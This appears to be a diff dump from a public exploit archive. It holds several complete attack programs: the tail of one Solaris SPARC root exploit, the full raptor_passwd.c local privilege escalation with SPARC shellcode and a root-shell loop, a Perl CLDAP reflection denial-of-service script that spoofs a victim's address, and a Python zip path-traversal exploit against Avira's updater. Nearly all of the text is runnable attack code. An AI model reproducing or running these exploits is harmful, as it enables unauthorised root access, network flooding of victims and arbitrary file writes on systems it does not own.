set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
var1_addr += ff_addr;
var2_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 76; i += 4)
set_val(buf, i, var1_addr - 5000);
/* apparently, we don't need to bruteforce */
set_val(buf, i, ff_addr);
set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret - 8); /* ret, before strcpy() */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
check_zero(addr - 8, sym); /* addr - 8 is the ret before strcpy() */
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

570
platforms/solaris/local/40730.c Executable file
View file

@ -0,0 +1,570 @@
/*
* $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users
* to gain privileges via unknown attack vectors (CAN-2004-0360).
*
* "Those of you lucky enough to have your lives, take them with you. However,
* leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). The
* exploitation wasn't so straight-forward: sending parameters to passwd(1)
* is somewhat tricky, standard ret-into-stack doesn't seem to work properly
* for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory
* references before reaching ret. Many thanks to Inode <inode@deadlocks.info>.
*
* Usage:
* $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall
* $ ./raptor_passwd <current password>
* [...]
* # id
* uid=0(root) gid=1(other) egid=3(sys)
* #
*
* Vulnerable platforms:
* Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested]
* Solaris 9 without 113476-11 [tested]
*/
#include <ctype.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/bin/passwd" // target vulnerable program
#define BUFSIZE 256 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env var
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
#define CMD "id;uname -a;uptime;\n" // execute upon exploitation
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_addr(int addr, char *pattern);
int find_pts(char **slave);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
void shell(int fd);
int read_prompt(int fd, char *buf, int size);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
char platform[256], release[256], cur_pass[256], tmp[256];
int i, offset, ff_addr, sc_addr, var_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int pid, cfd, newpts;
char *newpts_str;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy");
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s current_pass\n\n", argv[0]);
exit(1);
}
sprintf(cur_pass, "%s\n", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
buf[sizeof(buf) - 2] = '\n';
/* prepare the evil env var */
memset(var, 'B', sizeof(var));
var[sizeof(var) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
ff_addr = add_env(var); /* var must be before ff! */
sc_addr = add_env(ff);
add_env(sc);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
var_addr = sb - offset + arg_len;
ff_addr += var_addr;
sc_addr += var_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* check the addresses */
check_addr(var_addr, "var_addr");
check_addr(ff_addr, "ff_addr");
/* fill the evil buffer */
for (i = 0; i < BUFSIZE - 4; i += 4)
set_val(buf, i, var_addr);
/* may need to bruteforce the distance here */
set_val(buf, 112, ff_addr);
set_val(buf, 116, ret - 4); /* strcpy(), after the save */
/* fill the evil env var */
for (i = 0; i < VARSIZE - 4; i += 4)
set_val(var, i, var_addr);
set_val(var, 0, 0xffffffff); /* first byte must be 0xff! */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* find a free pts */
cfd = find_pts(&newpts_str);
/* fork() a new process */
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
/* parent process */
if (pid) {
sleep(1);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong prompt received\n");
exit(1);
}
/* send the current password */
write(cfd, cur_pass, strlen(cur_pass));
usleep(500000);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong current_pass?\n");
exit(1);
}
/* send the evil buffer */
write(cfd, buf, strlen(buf));
usleep(500000);
/* got root? */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for shell\n");
exit(1);
}
if (strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: not vulnerable\n");
exit(1);
}
if (!strstr(tmp, "# ")) {
fprintf(stderr, "Something went wrong...\n");
exit(1);
}
/* semi-interactive shell */
shell(cfd);
/* child process */
} else {
/* start new session and get rid of controlling terminal */
if (setsid() < 0) {
perror("setsid");
exit(1);
}
/* open the new pts */
if ((newpts = open(newpts_str, O_RDWR)) < 0) {
perror("open");
exit(1);
}
/* ninja terminal emulation */
ioctl(newpts, I_PUSH, "ptem");
ioctl(newpts, I_PUSH, "ldterm");
/* close the child fd */
close(cfd);
/* duplicate stdin */
if (dup2(newpts, 0) != 0) {
perror("dup2");
exit(1);
}
/* duplicate stdout */
if (dup2(newpts, 1) != 1) {
perror("dup2");
exit(1);
}
/* duplicate stderr */
if (dup2(newpts, 2) != 2) {
perror("dup2");
exit(1);
}
/* close the new pts */
if (newpts > 2)
close(newpts);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
}
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes
*/
void check_addr(int addr, char *pattern)
{
/* check for NULL byte (0x00) */
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
/* check for EOT byte (0x04) */
if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) ||
((addr & 0xff0000) == 0x040000) ||
((addr & 0xff000000) == 0x04000000)) {
fprintf(stderr, "Error: %s contains a 0x04!\n", pattern);
exit(1);
}
/* check for NL byte (0x0a) */
if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) ||
((addr & 0xff0000) == 0x0a0000) ||
((addr & 0xff000000) == 0x0a000000)) {
fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern);
exit(1);
}
/* check for CR byte (0x0d) */
if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) ||
((addr & 0xff0000) == 0x0d0000) ||
((addr & 0xff000000) == 0x0d000000)) {
fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern);
exit(1);
}
/* check for lowercase chars (0x61-0x7a) */
if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) ||
(islower((addr & 0xff0000) >> 16)) ||
(islower((addr & 0xff000000) >> 24))) {
fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern);
exit(1);
}
}
/*
* find_pts(): find a free slave pseudo-tty
*/
int find_pts(char **slave)
{
int master;
extern char *ptsname();
/* open master pseudo-tty device and get new slave pseudo-tty */
if ((master = open("/dev/ptmx", O_RDWR)) > 0) {
grantpt(master);
unlockpt(master);
*slave = ptsname(master);
return(master);
}
return(-1);
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_addr(addr - 4, sym);
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote from kill bill: vol. 2 */
fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n");
fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
/*
* read_prompt(): non-blocking read from fd
*/
int read_prompt(int fd, char *buf, int size)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = 2;
wait.tv_usec = 0;
bzero(buf, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}

108
platforms/windows/dos/40703.pl Executable file
View file

@ -0,0 +1,108 @@
#!/usr/bin/perl
#
# MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
# (CLDAP "AD Ping") query reflection DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
# MS Windows Server 2016 [NOT TESTED !!!]
#
# Description:
# The attacker sends a simple query to a vulnerable reflector
# supporting the Connectionless LDAP service (CLDAP) and using
# address spoofing makes it appear to originate from the intended
# victim. The CLDAP service responds to the spoofed address,
# sending unwanted network traffic to the attackers intended target.
#
# Amplification techniques allow bad actors to intensify the size
# of their attacks, because the responses generated by the LDAP
# servers are much larger than the attackers queries. In this case,
# the LDAP service responses are capable of reaching very high
# bandwidth and we have seen an average amplification factor of
# 46x and a peak of 55x.
#
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
# # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
# [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
# [ ======
# [ Usg: cldapdrdos.pl <ldap server> <target> <port>
# [ Default port: 389
# [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
# [ ======
# [ <todor.donev@gmail.com> Todor Donev
# [ Facebook: https://www.facebook.com/ethicalhackerorg
# [ Website: https://www.ethical-hacker.org/
# [ Sending CLDAP "AD Ping" packets..
# ^C
# # tcpdump -i eth0 -c4 port 389
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
# 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 4 packets captured
# 6 packets received by filter
# 0 packets dropped by kernel
#
#
#
use Net::RawIP;
print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";
my $cldap = $ARGV[0];
my $target = $ARGV[1];
my $port = $ARGV[2] || '389';
die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
my $query = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query .= "\x65\x74\x6c\x6f\x67\x6f\x6e";
my $sock = new Net::RawIP({ udp => {} }) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
$sock->set({ ip => { saddr => $target, daddr => $cldap},
udp => { source => 31337, dest => $port, data => $query} });
$sock->send;
}

52
platforms/windows/local/40741.py Executable file
View file

@ -0,0 +1,52 @@
# Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response.
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks for " ../ "
# characters which makes it possible to do a path traversal and write anywhere in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached.
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\
# 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or
# system32 directory which will get loaded and we gain remote command execution.
# 4. Open avira free antivirus
# 5. Go to update -> Manual Update
# 6. Select the malicious file
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC:
#!/usr/bin/python -w
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"
# Fix:
# Update to the latest version.